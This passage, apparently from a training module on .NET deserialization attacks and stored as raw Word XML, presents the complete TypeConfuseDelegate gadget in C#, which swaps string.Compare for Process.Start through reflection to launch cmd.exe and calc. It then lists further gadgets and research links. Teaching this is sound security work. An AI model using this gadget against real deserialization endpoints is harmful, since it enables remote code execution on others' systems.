        <w:t>sortedSet.Add("C:\\Windows\\System32\\cmd.exe");</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A333F84" w14:textId="582F022F" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Putting everything together, the whole gadget looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E725A8" w14:textId="61EEAFDE" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B71F2BA" w14:textId="4315128C" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>// We delegate `string.Compare` as a new `Comparison&lt;T&gt;`</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Delegate stringCompare = new Comparison&lt;string&gt;(string.Compare);</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>// We create a `MulticastDelegate` by chaining two `string.Compare` methods in a row</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Comparison&lt;string&gt; multicastDelegate = (Comparison&lt;string&gt;) MulticastDelegate.Combine(stringCompare, stringCompare);</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>// We create a `ComparisonComparer` instance using `Comparer.Create` and pass the `MulticastDelegate` that we created as the `Comparison&lt;T&gt;` parameter to the constructor</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>IComparer&lt;string&gt; comparisonComparer = Comparer&lt;string&gt;.Create(multicastDelegate);</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>// Get the private field _invocationList, specifying it is a Non-Public, Instance variable</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>// Get the invocation list from our MulticastDelegate</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>object[] invoke_list = multicastDelegate.GetInvocationList();</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>// Overwrite the second delegated function (string.Compare) with Process.Start</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>invoke_list[1] = new Func&lt;string, string, Process&gt;(Process.Start);</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>fi.SetValue(multicastDelegate, invoke_list);</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>// Create a SortedSet with our ComparisonComparer and add two strings</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>//   which will act as the FileName and Arguments parameters when passed</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>//   to Process.Start(string FileName, string Arguments)</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>SortedSet&lt;string&gt; sortedSet = new SortedSet&lt;string&gt;(comparisonComparer);</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>sortedSet.Add("/c calc");</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>sortedSet.Add("C:\\Windows\\System32\\cmd.exe");</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C0F324" w14:textId="6FC042FE" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Running the gadget, a calculator is spawned as expected, and although we have not tested it out yet, we know that the Compare method will be invoked upon deserialization as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7519D3FF" w14:textId="66AC6C8D" w:rsidR="00F43A27" w:rsidRDefault="00AB76BF" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E735FF7" wp14:editId="63EB0288">
            <wp:extent cx="5724524" cy="3305175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="696183684" name="Picture 6961836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3305175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="428F6D6D" w14:textId="77AF9636" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Going Beyond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B4AFC" w14:textId="3841208E" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>So far in this module, we have covered two gadgets - ObjectDataProvider and TypeConfuseDelegate. In the wild, there are many more gadgets, and researchers will often discover new ones or improve upon existing ones. A few other gadgets (not covered in this module) include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CA9D56" w14:textId="13497E8C" w:rsidR="00F43A27" w:rsidRDefault="00AB76BF" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidR="3CBF7C4D" w:rsidRPr="3CBF7C4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>PSObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="3CBF7C4D" w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E47845" w14:textId="029B6D70" w:rsidR="00F43A27" w:rsidRDefault="00AB76BF" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidR="3CBF7C4D" w:rsidRPr="3CBF7C4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>SessionSecurityToken</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="3CBF7C4D" w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C55B0D9" w14:textId="31DD53BE" w:rsidR="00F43A27" w:rsidRDefault="00AB76BF" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidR="3CBF7C4D" w:rsidRPr="3CBF7C4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>ClaimsPrincipal (in Vietnamese)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="3CBF7C4D" w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABE6EC0" w14:textId="650063FB" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Discovering these gadgets can be quite complicated, but for those of you who are keen to learn more about the process, the blog posts/papers linked to the gadgets above, as well as the following resources may be interesting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E46D08" w14:textId="0CA9CEB1" w:rsidR="00F43A27" w:rsidRDefault="00AB76BF" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidR="3CBF7C4D" w:rsidRPr="3CBF7C4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>"Friday the 13th JSON Attacks" White Paper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="3CBF7C4D" w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidR="3CBF7C4D" w:rsidRPr="3CBF7C4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>Video of the Talk</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="3CBF7C4D" w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDB6FD1" w14:textId="22BAA280" w:rsidR="00F43A27" w:rsidRDefault="00AB76BF" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20">
        <w:r w:rsidR="3CBF7C4D" w:rsidRPr="3CBF7C4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>"Are you my type?" White Paper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="3CBF7C4D" w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4230010D" w14:textId="6DAF7CF5" w:rsidR="00F43A27" w:rsidRDefault="00AB76BF" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21">
        <w:r w:rsidR="3CBF7C4D" w:rsidRPr="3CBF7C4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>Attacking .NET Deserialization Talk</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2DC08235" w14:textId="0B868236" w:rsidR="00F43A27" w:rsidRDefault="00F43A27" w:rsidP="3CBF7C4D"/>
    <w:p w14:paraId="11DE3CA3" w14:textId="77777777" w:rsidR="00AB76BF" w:rsidRDefault="00AB76BF" w:rsidP="3CBF7C4D"/>
    <w:sectPr w:rsidR="00AB76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9233A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E52C47A2"/>
    <w:lvl w:ilvl="0" w:tplc="7958C732">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6D9694D8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9CDC0D04">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D862C6D8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E4902B74">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4CCA331E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="97C2631E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DB721F9A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E098C75E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="9610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6DE8B7"/>
    <w:rsid w:val="001B476B"/>
    <w:rsid w:val="00407BA2"/>
    <w:rsid w:val="009B51B5"/>
    <w:rsid w:val="00A57007"/>
    <w:rsid w:val="00AB76BF"/>
    <w:rsid w:val="00F43A27"/>
    <w:rsid w:val="296DE8B7"/>
    <w:rsid w:val="3CBF7C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E8B7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{93F56FB6-46D3-4FA4-886B-1AB92CEE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media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEF%20CON%2025%20-%20Alvaro-Munoz-JSON-attacks-WP-UPDATED.pdf" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=eDfGpu3iE4Q"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testbnull.medium.com/some-notes-of-microsoft-exchange-deserialization-rce-cve-2021-42321-f6750243cdcd" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://muffsec.com/blog/finding-a-new-datacontractserializer-rce-gadget-chain/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://googleprojectzero.blogspot.com/2017/04/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/tiraniddo" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.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ZBfBYoK_Wr0" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/dotnet/api/system.comparison-1?view=net-7.0"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1234</Words>
  <Characters>7034</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>4</DocSecurity>
  <Lines>58</Lines>
  <Paragraphs>16</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>8252</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="60" baseType="variant">
      <vt:variant>
        <vt:i4>7602282</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>27</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=eDfGpu3iE4Q</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>524299</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>24</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1900598</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>21</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=ZBfBYoK_Wr0</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2621475</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>18</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://media.defcon.org/DEF CON 25/DEF CON 25 presentations/DEF CON 25 - Alvaro-Munoz-JSON-attacks-WP-UPDATED.pdf</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5767243</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>15</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
